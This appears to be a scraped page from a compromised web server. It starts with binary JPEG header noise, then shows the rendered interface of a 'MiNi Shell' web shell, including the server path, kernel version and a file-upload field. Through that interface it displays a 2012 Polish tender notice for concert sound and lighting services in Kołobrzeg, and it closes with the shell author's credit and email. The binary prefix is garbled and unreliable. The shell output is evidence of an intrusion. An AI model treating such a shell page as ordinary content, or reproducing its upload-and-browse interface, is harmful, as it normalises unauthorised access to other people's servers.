JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120412/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120412/114650-N-2012.html

<p class="kh_header"><b>Kołobrzeg: Usługi w zakresie organizacji imprez kulturalnych - nagłośnienie i oświetlenie imprez majowych organizowanych przez Regionalne Centrum Kultury w Kołobrzegu im. Z.Herberta</b><br>
<b>Numer ogłoszenia: 114650 - 2012; data zamieszczenia: 12.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Regionalne Centrum Kultury w Kołobrzegu im. Zbigniewa Herberta , ul. Solna 1, 78-100 Kołobrzeg, woj. zachodniopomorskie, tel. 94 3524949, faks 94 3524949.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rckk.bip.parseta.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi w zakresie organizacji imprez kulturalnych - nagłośnienie i oświetlenie imprez majowych organizowanych przez Regionalne Centrum Kultury w Kołobrzegu im. Z.Herberta.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje: 

Nagłośnienie i oświetlenie - obsługa techniczna przez cały okres trwania imprezy, montaż i demontaż nagłośnienia i oświetlenia
 

1. 04.05.2012.  Koncert Zespołów : Magnificient Muttley, Świadomość, Jamal


SYSTEM NAGŁOŚNIENIOWY F.O.H. 
 
System nagłośnieniowy powinien mieć moc adekwatną do wielkości imprezy. System musi równomiernie pokrywać dźwiękiem cały obszar widowni, musi być bezwzględnie uziemiony, wolny od szumów i przydźwięków sieciowych. System nagłaśniający co najmniej trójdrożny o mocy odpowiedniej dla danego miejsca, jednak nie mniej niż 20 kW.
Zespół gra dużą ilością niskich tonów i dlatego potrzebne są mocne i sprawne zestawy niskotonowe (SUBBASSY). 


KONSOLA F.O.H. 
Konsola powinna mieć minimum 36 kanałów, w każdym kanale: zasilanie phantom +48V, pad 20 dB, odwracanie polaryzacji, przestrajalny filtr górno przepustowy, czteropunktowa korekcja EQ w tym minimum cztery pełne filtry parametryczne (dobroć, częstotliwość, gain),10 grup BUS (minimum 8), 10 grup VCA (minimum 8), minimum cztery przełączalne wysyłki AUX pre/post. 
Konsola powinna być ustawiona centralnie na osi sceny, wśród publiczności, odpowiednio zabezpieczona, na podeście o wysokości max. 30cm, niedopuszczalne jest ustawienie konsoli np.: pod balkonem, za barem, pod ścianą, za głośnikami  itp. 



URZĄDZENIA PERYFERYJNE: 
- 31 pasmowy (tercjowy) Korektor Graficzny Stereo (insert sumy L/R) Klark-Technik DN-360, BSS. 
- 6 bramek, np.: Drawmer, BSS, 
- 10 kompresorów np.: dbx 160A, BSS, 
- efekty: co najmniej 3 np.: YAMAHA SPX990 tc electronics M-2000, Lexicon PCM-60, PCM-90, PCM-80 - w tym przynajmniej dwa urządzenia z efektami typu reverb i jedno urządzenie z efektem typu delay możliwością nabicia tempa (tap delay),
- odtwarzacz CD, rejestrator MD



SYSTEM MONITOROWY:
Konsola monitorowa powinna być usytuowana w bezpośrednim pobliżu sceny, zapewniającym obustronny kontakt wzrokowy realizatora monitorowego ze wszystkimi muzykami występującymi na scenie.
Konsola powinna posiadać 28 kanałów, w każdym kanale : zasilanie phantom + 48 V, pad 20 dB, odwracanie polaryzacji, przestrajalny filtr górno przepustowy, czteropunktowa korekcja EQ w tym minimum cztery pełne filtry parametryczne ( dobroć, częstotliwość, gain), minimum 8 przełączalnych wysyłek AUX pre/post fader.
Na każdą wysyłkę AUX musi być  zainsertowany 31-pkt. 31 pasmowy (tercjowy) korektor graficzny. 
W przypadku urządzeń peryferyjnych  bardzo dużo zależeć będzie od realizatora monitorów  i czy będzie on w stanie poradzić sobie z dużą  ilością dźwięków na scenie. 
Niemniej zaleca się:
- 1 procesor efektów, 
- 6 kompresorów dobrej klasy posiadających płynną regulację parametrów ATTACK, RELASE, TRESHOLD, RATIO, 
- 5 bramek dobrej klasy posiadających płynną regulację parametrów ATTACK, RELASE, TRESHOLD, RATIO. 



Zestawy głośnikowe monitorowe: 
Ponieważ wokaliści energicznie poruszają się po scenie zalecamy użycie Side Fill i. 
Na skraju sceny w zależności od jej szerokości powinny być dodatkowo ustawione monitory podłogowe, może to być jeden tor AUX. 
W zespole trzech muzyków używa systemu odsłuchu dousznego (IEM) 
1. AUX - zestawy podłogowe Vocal, 
2. AUX - ucho IEM Vocal 2 
3. AUX - ucho IEM - Key, 
4. AUX - zestaw podłogowy BASS 
5. AUX - zestaw podłogowy KEY 
6. AUX - zestaw podłogowy GITARA, 
7. AUX - zestaw drum fill zalecany dwudrożny z mocnym basem DRUMS + linia XLR do miksera perkusisty, 
8. AUX - zestaw SIDE FILL moc w zależności od szerokości sceny. 

Moc zestawów monitorowy powinna być dobrana odpowiednio do wielkości sceny ale konieczne jest aby dźwięk dobiegający z tych urządzeń (monitory) był głośny, czytelny i wyraźny. 
W czasie próby i koncertu obowiązkowa jest obecność doświadczonej ekipy technicznej odpowiedzialnej za aparaturę nagłaśniającą, w szczególności: inżynier systemu F.O.H., realizator systemu monitorowego, technik sceny. W przypadku pojawienia się konsoli cyfrowej  na F.O.H. należy zapewnienić osobę, która w trybie natychmiastowym skonfiguruje: input-patch, output-patch i inne niezbędne konfiguracyjne parametry konsoli. Realizator przywozi ze sobą zewnętrzny procesor efektów, na który należy wysłać sygnał z szyny AUX i przyjąć go z powrotem do konsoli na kanał wejściowy. Urządzenie podpinane jest mono, ma wejście i wyjście niesymetryczne JACK/TS.

2. 26.05.2012.  Teatr Władca Lalek ze Słupska, prezentacje artystyczne zespołów z Kamienia Pomorskiego, Koncert zespołu Max Klezmer Band z Krakowa, koncert Natalii Kukulskiej.


System frontowy
Aparatura musi być bezwzględnie uziemiona, wolna od szumów i przydźwięków
sieciowych lub innych, które uniemożliwiają przeprowadzenie koncertu na zadawalającym poziomie.
3 drożny system o uznanej reputacji z aktywnym podziałem pasm o mocy adekwatnej do nagłaśnianej powierzchni.
Kolumny basowe powinny być ustawione w taki sposób aby jednolicie pokrywały całą
powierzchnię nagłaśnianej powierzchni/terenu z uwzględnieniem interferencji wzajemnych.
Prosimy dodatkowo o zastosowanie układu cardioidalnego aby wyeliminować wpływ niskich częstotliwości na scenę.
Aparatura musi być zainstalowana, uruchomiona i sprawdzona przed przyjazdem techniki zespołu.
Zespół  wymaga zasilania o wartości nie mniejszej niż 230V.
Mikser frontowy
Ustawiony centralnie w osi sceny, w połowie długości widowni, najlepiej na podwyższeniu
(30-40cm), zabezpieczony przed dostępem osób postronnych oraz przed wpływem warunków
atmosferycznych. Nie akceptuje się ustawień miksera z boku sali, na balkonach oraz pod nimi oraz we wnękach.
Konsoleta cyfrowa  typu Yamaha M7CL (tylko wyjście AES/EBU w procesor sterujący systemem nagłośnieniowym) 
PM5D RH , PM1D
Soundcraft Vi4 , Vi6
Digidesign: Venue Profile (Waves Plugins)
DIGICO: SD7 , SD8 (Waves Plugins)
Konsoleta frontowa powinna być wyposażona w porty MADI IN/OUT dla 32 kanałów
(jeśli będzie problem z zapewnieniem konsolety spełniającej oczekiwania Zamawiającego- należy skontaktować się z realizatorem )
Procesory efektowe typu:
- Lexicon PCM 96
- TC.Electronic M-2000/3000   

System monitorowy
Wymagana cyfrowa konsoleta monitorowa typu Yamaha LS9-32 , M7CL48 , PM5D RH.
Wymaga się zapewnienia 2 systemów odsłuchu osobistego Sennheiser IEM 300 G3 lub Shure PSM900/1000. Zespół dysponuje kilkoma własnymi systemami odsłuchu osobistego oraz personalnymi mikserami umieszczonymi przy muzykach. Niezbędne jest zapewnienie
prawidłowego zasilania i okablowania do tego systemu zgodnie z sugestiami techniki zespołu.
Dwa mikrofony typu shotgun ustawione w kierunku publiczności które, podłączamy tylko do systemu monitorowego.

Zasilanie
System (aparatura + sprzęt muzyków) musi być zasilany z tego samego źródła,
umożliwiającego odpowiedni pobór mocy - adekwatnie do potrzeb zainstalowanej aparatury.
Zarówno w przypadku zasilania jednofazowego, jak też i trójfazowego, bezwzględnie wymagana jest instalacja z dodatkowym przewodem ochronnym. Firma zapewniająca nagłośnienie i zasilanie sprzętu zespołu bierze na siebie całkowitą odpowiedzialność za bezpieczeństwo wykonawców, realizatorów i techniki zespołu podczas prób i koncertu.

Wszystkie połączenia powinny być prowadzone w sposób symetryczny przy użyciu kabli
dobrej jakości i zakończone końcówkami XLR. Między sceną a konsoletą frontową musi być
poprowadzona komunikacja TalkBack.


Aparatura oświetleniowa :
- 1 x Grand MA light
- 27x panel LED RGB ( 3ch, max. Liczba grup - ka_dy na osobnym adresie ) / Sunstrip
- 12x Mac 700 / Claypaky 300 HPE
- 13x Mac 700 Wash / Mac 600
- 6 x Blinder bądź Molefay
- 6 x Atomic 3000
- 2x Wytwornica dymu + wiatrak -> w przypadku koncertów w niewielkich
obiektach zamknietych 2x hazer.
-	Follow spot z obsługą

Omikrofonowanie - zgodnie z riderami Zespołów

Dopuszcza się użycie innego równoważnego opisywanemu urządzenie         w przypadku gdy na użycie tego urządzenia zgodę wyrazi realizator Zespołu. Zgoda na użycie innego równoważnego opisywanemu urządzenia musi być zaakceptowana przez realizatora Zespołu przed jego użyciem..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.95.21.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 04.05.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zgodnie z SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zgodnie z SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zgodnie z SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zgodnie z SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zgodnie z SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rckk.bip.parseta.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Regionalne Centrum Kultury w Kołobrzegu im.Z.Herberta, ul. Solna 1, 78-100 Kołobrzeg.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.04.2012 godzina 10:00, miejsce: Regionalne Centrum Kultury w Kołobrzegu im.Z.Herberta, ul. Solna 1, 78-100 Kołobrzeg.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com